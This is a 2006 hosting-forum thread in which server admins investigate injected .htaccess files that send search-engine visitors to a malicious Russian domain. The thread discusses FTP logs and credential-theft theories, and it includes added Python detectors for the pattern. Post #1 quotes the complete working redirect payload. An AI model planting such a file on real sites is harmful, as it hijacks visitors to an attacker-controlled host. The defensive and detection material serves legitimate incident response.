  1. #1
    Join Date
    Nov 2004
    Location
    Switzerland
    Posts
    855

    Beware: new .htaccess hacking

    Hello

    On one of our servers, many websites ended up with an .htaccess file with this content:

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.* [OR]
    RewriteCond %{HTTP_REFERER} .*ask.* [OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
    RewriteCond %{HTTP_REFERER} .*excite.* [OR]
    RewriteCond %{HTTP_REFERER} .*www.* [OR]
    RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
    RewriteCond %{HTTP_REFERER} .*msn.* [OR]
    RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
    RewriteCond %{HTTP_REFERER} .*aol.* [OR]
    RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
    RewriteCond %{HTTP_REFERER} .*goto.* [OR]
    RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
    RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
    RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
    RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
    RewriteCond %{HTTP_REFERER} .*search.* [OR]
    RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
    RewriteCond %{HTTP_REFERER} .*dogpile.*
    RewriteRule ^(.*)$ http://vegas.org.ru/go.php?link=1 [R=301,L]

    When people visit the infected website, they are redirected to the URL located at the end of the file.

    I have deleted all these files and am investigating the matter.

    About server:
    Dual Xeon 2.8/HT
    4 Gb RAM
    CentOs
    Kernel 2.6.18.1 #1 SMP
    PHP 4.4.4
    Apache 1.3.37
    Direct Admin
    No CGI for most users
    register_globals = Off
    Disabled functions: exec,passthru,proc_open,proc_close,shell_exec,system,popen

    Linux is more secure than Windows, give me a break!
    .:. Enterprise SAN Consultant .:.
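    As an added example (not code from the thread), a small Python scanner for the pattern in that .htaccess: a chain of HTTP_REFERER conditions guarding a RewriteRule that sends the visitor off-site. It is meant for walking a server's .htaccess files and leaves ordinary front-controller rewrites and referrer-based hotlink protection alone; the sample files and the example.com host are constructed here.

```python
import re
from urllib.parse import urlsplit

# Added example, not code from the thread. Flags the pattern in the injected
# .htaccess above: RewriteCond tests on HTTP_REFERER (chained with [OR]) that
# guard a RewriteRule sending the visitor to an external host.

# Search-engine names the injected conditions key on (from the thread's sample).
SEARCH_ENGINE_HINTS = ("google", "yahoo", "msn", "ask", "search", "lycos", "altavista")

ANY_COND_RE = re.compile(r"^\s*RewriteCond\b", re.I)
REFERER_COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)

def scan_htaccess(text, own_hosts=()):
    """Return one finding per RewriteRule that redirects off-site and is
    guarded by HTTP_REFERER conditions; hosts in own_hosts are not off-site."""
    own = {h.lower() for h in own_hosts}
    findings, referer_conds = [], []      # conditions seen since the last rule
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REFERER_COND_RE.match(line)
        if m:
            referer_conds.append(m.group(1))
            continue
        if ANY_COND_RE.match(line):
            continue                      # condition on another variable, same chain
        m = RULE_RE.match(line)
        if not m:
            if line.strip() and not line.lstrip().startswith("#"):
                referer_conds = []        # any other directive ends the chain
            continue
        target, flags = m.group(2), (m.group(3) or "")
        # Only absolute URLs name a host; "-" and local paths never leave the site.
        host = urlsplit(target).hostname if "://" in target else None
        if referer_conds and host and host.lower() not in own:
            joined = " ".join(referer_conds).lower()
            findings.append({
                "line": lineno,
                "target": target,
                "conditions": len(referer_conds),
                "engines": sorted(h for h in SEARCH_ENGINE_HINTS if h in joined),
                "redirect": any(f.strip().upper().startswith("R") for f in flags.split(",")),
            })
        referer_conds = []
    return findings


# Constructed samples. INJECTED is an abridged copy of the file quoted above;
# the other two are ordinary, legitimate .htaccess idioms.
INJECTED = """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*search.*
RewriteRule ^(.*)$ http://vegas.org.ru/go.php?link=1 [R=301,L]
"""
FRONT_CONTROLLER = """RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
"""
HOTLINK_GUARD = """RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^https?://(www\\.)?example\\.com/ [NC]
RewriteRule \\.(gif|jpe?g|png)$ - [F]
"""

if __name__ == "__main__":
    for name in ("INJECTED", "FRONT_CONTROLLER", "HOTLINK_GUARD"):
        print(name, scan_htaccess(globals()[name]))
```

    The hotlink guard also tests HTTP_REFERER but its rule never names an external host, so it is not reported; pass your own domains in own_hosts to keep legitimate cross-host redirects quiet.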

  2. #2
    Thanks for the heads up. Will be useful to tell others this same thing.
    http://www.sinaihosting.com http://www.sinaidomains.com
    Cheap Webhosting. Buy now and dont pay straight away Save for christmas.
    Merry Christmas btw

  3. #3
    Join Date
    Nov 2001
    Location
    Vancouver
    Posts
    2,416
    Linux is more secure than Windows, give me a break!
    Co-opting .htaccess in this manner has nothing to do with the Windows vs Linux / Unix debate. Apache runs on both.

    What you've not done is illustrate *how* your machine was compromised.
    “Even those who arrange and design shrubberies are under
    considerable economic stress at this period in history.”

  4. #4
    Join Date
    Nov 2004
    Location
    Switzerland
    Posts
    855
    Out of 800 domains, about 50 were compromised this way. There is nothing in common between them. Only the files located at the root of the websites were infected.

    I have all the usual tools such as mod_security, apf, bfd... etc.

  5. #5
    Join Date
    Mar 2005
    Location
    Maine, USA
    Posts
    302
    What were the permissions of the .htaccess files before and after the hack?
    Were there any commonalities between the domains that got hacked, such as php scripts, blogs, CMS, etc?

    edit: looks like you aren't the only one: http://www.castlecops.com/p857082-Site_Compromised.html
    Last edited by jzukerman; 12-14-2006 at 08:00 PM.

  6. #6
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    I actually have been seeing this on other servers. File permissions are correct.

    Check your ftp logs, I have actually seen people upload the htaccess files.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  7. #7
    Join Date
    Nov 2001
    Location
    Vancouver
    Posts
    2,416
    "0.php"

    Nice. You can find a bittorrent site out there via google with that thing accessible right now. Edit: that was in Google cache. 653 hits returned (mostly the same 3) for a search in Google "networkfilemanagerphp l33t". Installed, it would appear, in various places including "www/icons".
    Last edited by mwatkins; 12-14-2006 at 08:22 PM.

  8. #8
    Join Date
    Nov 2004
    Location
    Switzerland
    Posts
    855
    I have found no 0.php file. All .htaccess files had correct permissions.

    One customer complained and that is what prompted me to search server-wide.

    I have miles of FTP logs with many .htaccess but I can't know if they are related or not.

    I am working on the issue to find out how it happened. I am quite sure that this is an Apache exploit. Some websites were just FULL HTML.

  9. #9
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Quote Originally Posted by edelweisshosting
    I have found no 0.php file. All .htaccess files had correct permissions.

    One customer complained and that is what prompted me to search server-wide.

    I have miles of FTP logs with many .htaccess but I can't know if they are related or not.

    I am working on the issue to find out how it happened. I am quite sure that this is an Apache exploit. Some websites were just FULL HTML.
    Well we have had the exact same content injected into htaccess via ftp.

  10. #10
    Join Date
    Nov 2004
    Location
    Switzerland
    Posts
    855
    Could you tell me more please?

    Do you mean that they have got FTP access to all these accounts?

    The server uses ProFTPd 1.3.0rc2

  11. #11
    Join Date
    Nov 2001
    Location
    Vancouver
    Posts
    2,416
    Might want to do a `grep -i` through *.php in one of the affected clients home directories, looking for "networkfilemanagerphp".

    Doesn't have to be named 0.php.

    And perhaps that's a fork in the trail anyway.

  12. #12
    Join Date
    Feb 2006
    Location
    Swellyville
    Posts
    2,340
    Good heads up on this, thanks!

  13. #13
    Join Date
    Nov 2004
    Location
    Switzerland
    Posts
    855
    find . -name '*.php' -exec egrep 'network' {} /dev/null \;

    gives nothing but:

    I discovered that all infected websites are using phpBB. The infected .htaccess was always one level above the installation folder but never in the installation folder itself.

  14. #14
    phpbb has been known to have security flaws. If you don't keep updated with the latest packages, then it is quite possible that you were hacked through phpbb. Don't forget the possibility that the culprit is one of your own users.

  15. #15
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Dec 14 15:14:23 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/.htaccess uploaded (883 bytes, 33.73KB/sec)
    Dec 14 15:23:23 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//www/.htaccess uploaded (883 bytes, 33.86KB/sec)
    Dec 14 15:23:23 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/.htaccess uploaded (883 bytes, 33.83KB/sec)
    Dec 14 15:29:04 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//www/.htaccess uploaded (883 bytes, 15.39KB/sec)
    Dec 14 15:29:04 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/.htaccess uploaded (883 bytes, 33.67KB/sec)
    Dec 14 15:32:32 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//www/.htaccess uploaded (883 bytes, 33.64KB/sec)
    Dec 14 15:32:33 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/.htaccess uploaded (883 bytes, 33.55KB/sec)
    Dec 14 15:42:46 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//www/.htaccess uploaded (883 bytes, 14.93KB/sec)
    Dec 14 15:42:46 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/.htaccess uploaded (883 bytes, 33.69KB/sec)
    Dec 14 15:43:30 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//www/.htaccess uploaded (883 bytes, 33.40KB/sec)
    Dec 14 15:43:30 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/.htaccess uploaded (883 bytes, 33.49KB/sec)
    Dec 14 15:44:55 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//www/.htaccess uploaded (883 bytes, 33.87KB/sec)
    Dec 14 15:44:55 pure-ftpd: ([email protected]) [NOTICE] /home/xxxx//public_html/.htaccess uploaded (883 bytes, 33.80KB/sec)

    That is all different accounts. Just recently had it happen again. It has happened on both proftpd and pure-ftpd regardless of changing the password. This is a cpanel box.
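    An added example, not from the thread: a Python helper that parses pure-ftpd lines of the shape quoted above and reports source IPs that uploaded an .htaccess into several different accounts' home directories within a short window, which is the cross-account pattern in Steven's excerpt. It assumes the parenthesised field is user@source-ip as in pure-ftpd's syslog output (the quoted copy shows it redacted); the sample lines, account names and 203.0.113.x / 198.51.100.x addresses are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Added example, not from the thread. Parses pure-ftpd syslog lines like the
# ones quoted above and reports source IPs that pushed an .htaccess into
# several accounts' home directories within a short window. Assumes the
# parenthesised field is user@source-ip (pure-ftpd's syslog format; the
# quoted copy shows it redacted). Sample lines and addresses are constructed.

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) pure-ftpd: "
    r"\((?P<user>[^@)]+)@(?P<ip>[^)]+)\) \[NOTICE\] (?P<path>\S+) uploaded "
    r"\((?P<size>\d+) bytes"
)
HOME_RE = re.compile(r"^/home/(?P<account>[^/]+)/")


def parse_uploads(lines, year=2006):
    """Yield one dict per upload record; non-upload lines are skipped.
    Syslog omits the year, so the caller supplies it."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        home = HOME_RE.match(m["path"])
        yield {"ts": ts, "user": m["user"], "ip": m["ip"], "path": m["path"],
               "size": int(m["size"]), "account": home["account"] if home else None}


def htaccess_spray(lines, min_accounts=3, window_minutes=60):
    """Return {ip: sorted accounts touched} for every source IP that uploaded
    an .htaccess into at least min_accounts distinct /home/<account> trees
    within any span of window_minutes."""
    by_ip = defaultdict(list)
    for up in parse_uploads(lines):
        if up["path"].endswith("/.htaccess") and up["account"]:
            by_ip[up["ip"]].append(up)
    hits = {}
    for ip, ups in by_ip.items():
        ups.sort(key=lambda u: u["ts"])
        lo = 0                                  # sliding window over uploads
        for hi in range(len(ups)):
            while (ups[hi]["ts"] - ups[lo]["ts"]).total_seconds() > window_minutes * 60:
                lo += 1
            if len({u["account"] for u in ups[lo:hi + 1]}) >= min_accounts:
                hits[ip] = sorted({u["account"] for u in ups})
                break
    return hits


# Constructed log excerpt: one IP writes .htaccess into three accounts in
# 15 minutes; a second IP is an ordinary customer upload.
SAMPLE_LOG = """\
Dec 14 15:14:23 pure-ftpd: (acct1@203.0.113.7) [NOTICE] /home/acct1//public_html/.htaccess uploaded (883 bytes, 33.73KB/sec)
Dec 14 15:20:02 pure-ftpd: (acct1@203.0.113.7) [INFO] Logout.
Dec 14 15:23:23 pure-ftpd: (acct2@203.0.113.7) [NOTICE] /home/acct2//www/.htaccess uploaded (883 bytes, 33.86KB/sec)
Dec 14 15:29:04 pure-ftpd: (acct3@203.0.113.7) [NOTICE] /home/acct3//public_html/.htaccess uploaded (883 bytes, 15.39KB/sec)
Dec 14 15:31:10 pure-ftpd: (acct4@198.51.100.9) [NOTICE] /home/acct4//public_html/index.html uploaded (2041 bytes, 40.10KB/sec)
Dec 14 16:05:40 pure-ftpd: (acct4@198.51.100.9) [NOTICE] /home/acct4//public_html/.htaccess uploaded (212 bytes, 10.00KB/sec)
"""

if __name__ == "__main__":
    print(htaccess_spray(SAMPLE_LOG.splitlines()))
```

    The identical 883-byte size across accounts is a second signal worth grouping on, since the same file was being dropped everywhere.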

  16. #16
    Join Date
    Nov 2004
    Location
    Switzerland
    Posts
    855
    Impressive!

    Thank you. I am going to analyse my logs again.

  17. #17
    Join Date
    Nov 2001
    Location
    Vancouver
    Posts
    2,416
    Quote Originally Posted by Steven
    That is all different accounts. Just recently had it happen again. It has happened on both proftpd and pure-ftpd regardless of changing the password. This is a cpanel box.
    Interesting. I use neither. Might keep it that way!

  18. #18
    Join Date
    Oct 2006
    Location
    uk
    Posts
    448
    It's probably a cpanel or other exploit.

    pure-ftp is very secure....

  19. #19
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Quote Originally Posted by doc_flabby
    It's probably a cpanel or other exploit.

    pure-ftp is very secure....

    cpanel exploit? That would mean they would have to obtain the password files and crack the passwords.

  20. #20
    Join Date
    Oct 2006
    Location
    uk
    Posts
    448
    They could have stolen the passwords through cpanel, via a modified login page.

  21. #21
    Join Date
    Oct 2002
    Location
    State of Disbelief
    Posts
    22,947
    *subscribes to thread*

  22. #22
    Join Date
    Feb 2001
    Location
    West Michigan, USA
    Posts
    9,675
    It's users' compromised scripts that allowed access. Not Linux, cPanel, .htaccess or even the cycles of the moon.

    --Tina
    ||| 99.999% Uptime SLA!!!
    Plenty of space and bandwidth to fit your needs!
    www.AEIandYou.com - - (WP Friendly - Premium Reseller Hosting and Cheap Dedicated Servers)

  23. #23
    Join Date
    Jul 2002
    Posts
    3,729
    Quote Originally Posted by doc_flabby
    They could have stolen the passwords through cpanel, via a modified login page.
    More likely they compromised some junk php script and used it to grab a copy of /etc/shadow, went off and cracked easy passes, and came back to all the accounts they had been able to crack.

  24. #24
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Quote Originally Posted by Andrew
    More likely they compromised some junk php script and used it to grab a copy of /etc/shadow, went off and cracked easy passes, and came back to all the accounts they had been able to crack.

    Question is how did they get /etc/shadow?

  25. #25
    Quote Originally Posted by AH-Tina
    Its users' compromised scripts that allowed access. Not Linux, cPanel, .htaccess or even the cycles of the moon.

    --Tina
    Making a statement like that is merely your best guess. However, it should have been mentioned as such. Sending users in the wrong direction can be a little frustrating as it is.

    <snipped referral to removed post>
    Last edited by bear; 12-16-2006 at 11:57 AM.

  26. #26
    Join Date
    Jul 2002
    Posts
    3,729
    Quote Originally Posted by Steven
    Question is how did they get /etc/shadow?
    That's the mystery wrapped up in an enigma. Could be any compromisable script that they've found. Even one line of code in some non-commercial script. I know you know this, but I'm trying to quell the 'it's probably Cpanel' people. More than likely it has nothing whatsoever to do with Cpanel.

  27. #27
    Can we please stay on topic?

  28. #28
    Join Date
    Oct 2002
    Location
    State of Disbelief
    Posts
    22,947
    Yes, great idea.
    Cleaned up a bit, please stay on the subject.

  29. #29
    Join Date
    Oct 2006
    Location
    uk
    Posts
    448
    My point really was that as there are no known root exploits for pure-ftp, it is highly unlikely they got the passwords through the ftp program.

  30. #30
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Quote Originally Posted by doc_flabby
    My point really was that as there are no known root exploits for pure-ftp, it is highly unlikely they got the passwords through the ftp program.

    I agree with you on that, but that there are no known public ones does not rule out private ones. (There are a few private ones for proftpd rolling around, from what I heard.)

  31. #31
    Join Date
    Feb 2001
    Location
    West Michigan, USA
    Posts
    9,675
    Quote Originally Posted by hbidad
    Making a statement like that is merely your best guess. However, it should have been mentioned as such. Sending users in the wrong direction can be a little frustrating as it is.

    <snipped referral to removed post>

    Yup, I meant to say "probably" - but left that out. My point was really that it's probably not a cpanel, Linux or .htaccess exploit.

    Thanks for politely pointing that out.

    --Tina

  32. #32
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,080
    Quote Originally Posted by Steven
    That is all different accounts. Just recently had it happen again. It has happened on both proftpd and pure-ftpd regardless of changing the password. This is a cpanel box.
    Lame, just had a box with the same problem and that same TP IP is still being used... I wonder how many servers have been exploited by it.

    Have not looked too far into it yet but so far all the sites exploited do not run phpbb and this one server was running proftpd.
    Last edited by eth00; 12-16-2006 at 07:03 PM.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  33. #33
    Join Date
    Apr 2002
    Location
    Auckland - New Zealand
    Posts
    1,572
    I remember an old problem with cpanel, where there were temporary shadow files (shadow.tmpeditlib) that were chmod 644! Maybe make sure you don't have anything like that hanging around (that's been fixed for some time, btw).

    It does sound like a password cracker has been used here, either that or they have all the user names and the accounts have weak passwords that got brute forced. I guess checking the logs with a fine toothed comb is needed here..

  34. #34
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Quote Originally Posted by Dotable Steve
    I remember an old problem with cpanel, where there were temporary shadow files (shadow.tmpeditlib) that were chmod 644! Maybe make sure you don't have anything like that hanging around (that's been fixed for some time, btw).

    It does sound like a password cracker has been used here, either that or they have all the user names and the accounts have weak passwords that got brute forced. I guess checking the logs with a fine toothed comb is needed here..
    I thought the same thing with the shadow files. This happened on accounts which I personally changed.

  35. #35
    Join Date
    Mar 2001
    Posts
    1,434
    Proftpd did have a recent exploit for 1.3.0 and lower:
    http://www.securityfocus.com/archive...0/200/threaded

    But this one requires uncommon settings in proftpd to be viable, and then only allows remote code execution, not access to passwords.

    We've noticed a huge increasing trend over the past month of brute force u/p combos not only via ssh (as usual), but pop3, smtp authentication, ftp, etc... And with many exploited php/perl scripts, hackers now just collect /etc/passwd files, then try and brute force the usernames via pop/smtp authentication, etc... to bypass traditional ftp/ssh blocking/bfd style systems. They put the bot armies to work to vary IP's as well, rate limit to get under the bfd radar, etc...

    If anyone has news on an actual proftpd exploit that allows u/p compromises, please tell the proftpd group.

    - John C.

  36. #36
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Quote Originally Posted by JohnCrowley
    Proftpd did have a recent exploit for 1.3.0 and lower:
    http://www.securityfocus.com/archive...0/200/threaded

    But this one requires uncommon settings in proftpd to be viable, and then only allows remote code execution, not access to passwords.

    We've noticed a huge increasing trend over the past month of brute force u/p combos not only via ssh (as usual), but pop3, smtp authentication, ftp, etc... And with many exploited php/perl scripts, hackers now just collect /etc/passwd files, then try and brute force the usernames via pop/smtp authentication, etc... to bypass traditional ftp/ssh blocking/bfd style systems. They put the bot armies to work to vary IP's as well, rate limit to get under the bfd radar, etc...

    If anyone has news on an actual proftpd exploit that allows u/p compromises, please tell the proftpd group.

    - John C.

    I'm just having a hard time accepting it's just a brute force because one of the accounts had its password changed to something like: 234$%$ds332*

    and it got hit.

  37. #37
    Join Date
    Apr 2002
    Location
    Auckland - New Zealand
    Posts
    1,572
    Steven,

    Have you checked the permissions on the ftp password files as well?
    With a strong password like that, it would take eons to crack, how soon after changing did it get hit?

    Was the password changed or was that one that you set, still used?

  38. #38
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Quote Originally Posted by Dotable Steve
    Steven,

    Have you checked the permissions on the ftp password files as well?
    With a strong password like that, it would take eons to crack, how soon after changing did it get hit?

    Was the password changed or was that one that you set, still used?

    Yes, the permissions were correct, that is one thing I checked right away. After changing the password, it took about a week to get hit again.

  39. #39
    Join Date
    Apr 2002
    Location
    Auckland - New Zealand
    Posts
    1,572
    Quote Originally Posted by Steven
    Yes, the permissions were correct, that is one thing I checked right away. After changing the password, it took about a week to get hit again.
    That sounds nasty.. did you check to see if the password had been changed at all?

    Just wondering if there is a hole allowing passwords to get reset or something, maybe someone intercepted a password reset email, I won't go into details there, but something to check maybe if there were any attempts of anything like that.

  40. #40
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,290
    Quote Originally Posted by Dotable Steve
    That sounds nasty.. did you check to see if the password had been changed at all?

    Just wondering if there is a hole allowing passwords to get reset or something, maybe someone intercepted a password reset email, I won't go into details there, but something to check maybe if there were any attempts of anything like that.

    You know what Steve, I have not checked that yet.
